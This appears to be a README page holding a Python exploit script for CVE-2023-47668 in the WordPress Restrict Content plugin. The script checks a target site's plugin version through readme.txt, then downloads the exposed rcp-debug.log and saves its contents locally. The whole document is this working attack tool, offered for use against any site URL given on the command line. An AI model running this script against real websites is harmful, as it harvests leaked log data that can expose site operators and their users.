README.md
Rendering markdown...
import requests
import sys
#exploit by : Nxploit Khaled_alenazi
def check_url(url):
readme_url = f"{url}/wp-content/plugins/restrict-content/readme.txt"
try:
response = requests.get(readme_url, timeout=10)
if response.status_code == 200:
if "Stable tag:" in response.text:
lines = response.text.splitlines()
for line in lines:
if "Stable tag:" in line:
version = line.split(":")[-1].strip()
if version <= "3.2.7":
message = f"[!] The site {url} is vulnerable (Stable tag: {version})"
else:
message = f"[+] The site {url} is not vulnerable (Stable tag: {version})"
return message
return f"[-] Stable tag not found in {readme_url}"
else:
return f"[-] Failed to access {readme_url} (Status code: {response.status_code})"
except requests.RequestException as e:
return f"[!] Error while accessing {readme_url}: {e}"
def read_info_log(url):
log_url = f"{url}/wp-content/uploads/rcp-debug.log"
try:
response = requests.get(log_url, timeout=10)
if response.status_code == 200:
content_message = f"[!] Log file found at {log_url}\n\nLog file content:\n{response.text}"
return content_message
else:
return f"[-] Log file not found at {log_url} (Status code: {response.status_code})"
except requests.RequestException as e:
return f"[!] Error while accessing {log_url}: {e}"
def log_to_file(message):
with open("log.txt", "a") as log_file:
log_file.write(message + "\n")
print("[+] Result saved to log.txt")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python CVE-2023-47668.py <site_url>")
print("CVE-2023-47668 - Restrict Content 3.2.7 - Information Exposure via legacy log file")
sys.exit(1)
target_url = sys.argv[1].strip()
print("\n[1] Checking readme.txt")
result = check_url(target_url)
print(result)
log_to_file(result)
print("\n[2] Checking rcp-debug.log")
result = read_info_log(target_url)
print(result)
log_to_file(result)